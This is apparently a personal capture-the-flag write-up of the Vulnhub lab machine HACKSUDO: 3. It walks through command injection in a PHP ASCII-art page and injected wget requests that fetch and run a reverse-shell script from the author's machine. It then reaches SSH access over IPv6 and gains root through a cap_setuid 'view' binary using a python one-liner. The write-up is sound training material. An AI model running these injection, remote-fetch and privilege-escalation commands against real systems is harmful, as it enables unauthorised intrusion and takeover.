Vulnhub: HACKSUDO: 3
HACKSUDO: 3
This is HACKSUDO: 3 from Vulnhub. It says:
This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh), and
Find the user.txt and root.txt flag submit it to the mybox channel on Discord and get chance to get hacksudo machine hacking course free
I don’t normally post these anywhere but hey, maybe I will this time.
Ports
LOL. The first time I scanned this I only had a web port (HTTP on 80). After I completed it I scanned it again and SSH was open. Whaaaaaat? I don’t think I opened it; maybe I was too quick on the scan. Whatever, we start with web.
HTTP/80
The website has a few things on it; it mostly presents as a copy of a github project but some enumeration reveals javascript files related to games and a few PHP files including info.php, login.php and generator.php. We don’t have any credentials so I ignore login.php; I run a bunch of feroxbuster scans but I don’t find anything interesting.
generator.php
This is a page that allows you to enter a name, which it then renders in ASCII art. Neat. It is also command injectable; eg:
name && id
Which produces:
‘name’ as ASCII art, and
uid=33(www-data) gid=33(www-data) groups=33(www-data)
I try a few one-liner reverse shells but I can’t get one to fire. I try using echo to write a file on the webserver; the file gets created but it’s empty. I try with printf; same thing. Next I try using curl and wget to retrieve a shell from my box, eg (this is from Burp Suite):
ip=id && wget http://192.168.1.192:9090/cmd.php -O /var/www/html/cmd.php&submit=submit
This will create the file, but it’s empty, so no bueno. I try again but placing the file in the /tmp directory; still empty. I try /dev/shm - success! The sequence is:
Upload the file (this was just a bash reverse shell):
ip=id && wget http://192.168.1.192:9090/shell.sh -O /dev/shm/shell.sh
Now make it executable:
ip=id && chmod x /dev/shm/shell.sh&submit=submit
And now call it:
ip=id && /dev/shm/shell.sh&submit=submit
And in my listener:
hacksudo
I have a look in the webserver; turns out my feroxbuster searches found most of the content. I check login.php and find this line:
you have logged in successfully , 0x Open The Next Door key is = GMYTGMBTGAZTAMZRGIYDGMJTGAZTAMZQGMZDEMBTGEZTAMZQGMYDGMY=
But even now I’ve rooted the box I’m still not sure what that means.
One level up in /var/www, we find this:
I won’t reproduce it here, but we have a ROT13 encoded file, which contains SSH credentials for hacksudo (the password is hashed, but John deals with it).
But, we had no open SSH port? What about internally? Yes. I couldn’t get it to work with the normal commands but using IPv6 it was ok, not sure if that was intentional or not.
root
There are multiple ways of escalating to root on this box and I know that because after I’d done this, I watched a YouTube video of someone else doing the box and he used the LXD privesc which was much more complicated than what I did.
Linpeas points this out:
And GTFOBins lights the way:
Cool.
Since I knew there was at least one other method for getting root, I went to look to see if I could find another one. I noticed linpeas pointed out that view also had the cap_setuid capability. Would that work - we have a method at GTFObins?
Yes, it does work - with a slight modification. Note; there are several different view binaries on the box. We want this one:
/home/hacksudo/view cap_setuid=ep
Trying it directly (more or less) from GTFObins:
hacksudo@hacksudo:~$ ./view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
provokes this error:
reset: unknown terminal type unknown
In order to fix this, I changed a few things. Firstly, SSH with -t (this may not have been necessary):
www-data@hacksudo:/var/www/html$ ssh -6 -t hacksudo@localhost
Next, check (and then set) TERM:
And finally:
hacksudo@hacksudo:~$ ./view -c ':python3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Boom.
So; two ways to root and both different to the video I watched.